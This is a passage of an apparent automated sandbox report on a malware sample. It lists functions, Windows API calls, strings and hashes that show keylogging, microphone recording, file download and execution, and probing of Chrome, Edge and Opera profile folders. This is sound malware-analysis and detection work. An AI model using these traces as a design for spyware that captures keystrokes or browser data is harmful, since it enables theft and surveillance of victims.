                                                                                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DownloadFileSleep
                                                                                                                                  • String ID: !D@
                                                                                                                                  • API String ID: 1931167962-604454484
                                                                                                                                  • Opcode ID: ee98af31ce45b4d0a512cb594eae40172249049edaa64c13d2d68bf68acbaca7
                                                                                                                                  • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                                                                                                  • Opcode Fuzzy Hash: ee98af31ce45b4d0a512cb594eae40172249049edaa64c13d2d68bf68acbaca7
                                                                                                                                  • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                                                                                  Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _strlen
                                                                                                                                  • String ID: : $Se.
                                                                                                                                  • API String ID: 4218353326-4089948878
                                                                                                                                  • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                  • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                  • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                  • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                  Function 0041B580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LocalTime
                                                                                                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                  • API String ID: 481472006-2430845779
                                                                                                                                  • Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                                                                  • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                                                                                  • Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                                                                  • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                                                                                  Function 10002ADA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10002B4F
                                                                                                                                  • ___raise_securityfailure.LIBCMT ref: 10002C36
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                  • String ID: fYM/
                                                                                                                                  • API String ID: 3761405300-2459865102
                                                                                                                                  • Opcode ID: 70e6b92d4ff8390b97530531c8a31b2bf75f1acffc31a4c733281a71a18183d0
                                                                                                                                  • Instruction ID: 3e738cf41e4fedca429440b27c5ceba6e76d410b83429fe86edfa1b27721cda5
                                                                                                                                  • Opcode Fuzzy Hash: 70e6b92d4ff8390b97530531c8a31b2bf75f1acffc31a4c733281a71a18183d0
                                                                                                                                  • Instruction Fuzzy Hash: 2F21BEB8512361AAF714CF15DED1B44BBE4FB48764F10C02AE9089A3A0E7B0D581CF55
                                                                                                                                  Function 0041ADA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                  • String ID: alarm.wav$hYG
                                                                                                                                  • API String ID: 1174141254-2782910960
                                                                                                                                  • Opcode ID: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                                                                                  • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                                                                                                  • Opcode Fuzzy Hash: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                                                                                  • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                                                                                                  Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                                                                  • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                  • String ID: Online Keylogger Stopped
                                                                                                                                  • API String ID: 1623830855-1496645233
                                                                                                                                  • Opcode ID: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                                                                                  • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                                                                                  • Opcode Fuzzy Hash: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                                                                                  • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                                                                                  Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                    • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                  • String ID: Unknown exception
                                                                                                                                  • API String ID: 3476068407-410509341
                                                                                                                                  • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                  • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                  • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                  • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                                                                  Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • waveInPrepareHeader.WINMM(00309000,00000020,?), ref: 00401849
                                                                                                                                  • waveInAddBuffer.WINMM(00309000,00000020), ref: 0040185F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wave$BufferHeaderPrepare
                                                                                                                                  • String ID: XMG
                                                                                                                                  • API String ID: 2315374483-813777761
                                                                                                                                  • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                                                                  • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                                                                                  • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                                                                  • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                                                                                  Function 00448B66 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LocaleValid
                                                                                                                                  • String ID: IsValidLocaleName$kKD
                                                                                                                                  • API String ID: 1901932003-3269126172
                                                                                                                                  • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                                                                  • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                                                                                  • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                                                                  • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                                                                                  Function 0040C4FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                  • API String ID: 1174141254-4188645398
                                                                                                                                  • Opcode ID: 29b03ca63f58c4e9cb5d44d4ea3b58437774ba523255f91807ed95477180a7a0
                                                                                                                                  • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                                                                                  • Opcode Fuzzy Hash: 29b03ca63f58c4e9cb5d44d4ea3b58437774ba523255f91807ed95477180a7a0
                                                                                                                                  • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                                                                                  Function 0040C561 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                  • API String ID: 1174141254-2800177040
                                                                                                                                  • Opcode ID: 54fa268e09270b066402298ccbf44bb2cc4e581b8543ef34c8c39420bd5cdf49
                                                                                                                                  • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                                                                                  • Opcode Fuzzy Hash: 54fa268e09270b066402298ccbf44bb2cc4e581b8543ef34c8c39420bd5cdf49
                                                                                                                                  • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                                                                                  Function 0040C5C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                  • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                                                  • API String ID: 1174141254-1629609700
                                                                                                                                  • Opcode ID: 065b68070bdbd5b2fe1a65daa2b69e6499b3515447771c21861f83453f785150
                                                                                                                                  • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                                                                                  • Opcode Fuzzy Hash: 065b68070bdbd5b2fe1a65daa2b69e6499b3515447771c21861f83453f785150
                                                                                                                                  • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                                                                                  Function 00443885 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free
                                                                                                                                  • String ID: X13
                                                                                                                                  • API String ID: 269201875-3831742654
                                                                                                                                  • Opcode ID: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                                                                                                                  • Instruction ID: 5d396c1abc39b18bdc3e623667384c8b5cce6391ee106473ff554fc58991571d
                                                                                                                                  • Opcode Fuzzy Hash: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                                                                                                                  • Instruction Fuzzy Hash: 7CE0E532A0652041F675763B2D05A5B47C55FC2B3AF22033BF028861C1DFEC494A606E
                                                                                                                                  Function 10005EB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 10005F02
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                  • String ID: InitializeCriticalSectionEx$fYM/
                                                                                                                                  • API String ID: 2593887523-491538088
                                                                                                                                  • Opcode ID: 23f5f9ae49b14113c5d6200a49ec80ced671738cf4e12568bfd4cd84ec865e94
                                                                                                                                  • Instruction ID: 674605c196627833912876511d98c7499c33f247a669ee446c9f59910835c79f
                                                                                                                                  • Opcode Fuzzy Hash: 23f5f9ae49b14113c5d6200a49ec80ced671738cf4e12568bfd4cd84ec865e94
                                                                                                                                  • Instruction Fuzzy Hash: B0F0B43154011CBBFB159F50CC00DEE7F61DB183D1B108025FD0966164CF32AD10AAA4
                                                                                                                                  Function 0040B681 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                                                                    • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                                                                                                    • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                                                                    • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                                                                                                                    • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                                                                    • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                                                                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                                                                                                                    • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                                                                                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                  • String ID: [AltL]$[AltR]
                                                                                                                                  • API String ID: 2738857842-2658077756
                                                                                                                                  • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                                                  • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                                                                                  • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                                                  • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                                                                  Function 10005DB2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Free
                                                                                                                                  • String ID: FlsFree$fYM/
                                                                                                                                  • API String ID: 3978063606-3022025479
                                                                                                                                  • Opcode ID: 3dc04d7602fd972ac9f1dfdbe0cda133bd08d865af84607d293c51c8933b5904
                                                                                                                                  • Instruction ID: b54f93d543b27d774a413c601eeb0e62583d490719bbc6bc30dd5d2f1f1d8414
                                                                                                                                  • Opcode Fuzzy Hash: 3dc04d7602fd972ac9f1dfdbe0cda133bd08d865af84607d293c51c8933b5904
                                                                                                                                  • Instruction Fuzzy Hash: B8E0E571A00128ABF321EB648C15EEFBBA0CB09BC1B00416AFE0667209CE325D0096E6
                                                                                                                                  Function 004161C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExecuteShell
                                                                                                                                  • String ID: !D@$open
                                                                                                                                  • API String ID: 587946157-1586967515
                                                                                                                                  • Opcode ID: 31e2dd4c7e7595a01e7bd0564459710f857acc12e222bd97d5ac53f00a1c7680
                                                                                                                                  • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                                                                  • Opcode Fuzzy Hash: 31e2dd4c7e7595a01e7bd0564459710f857acc12e222bd97d5ac53f00a1c7680
                                                                                                                                  • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                                                                  Function 0040B6DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: State
                                                                                                                                  • String ID: [CtrlL]$[CtrlR]
                                                                                                                                  • API String ID: 1649606143-2446555240
                                                                                                                                  • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                                                  • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                                                                  • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                                                  • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                                                                  Function 0040E7DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
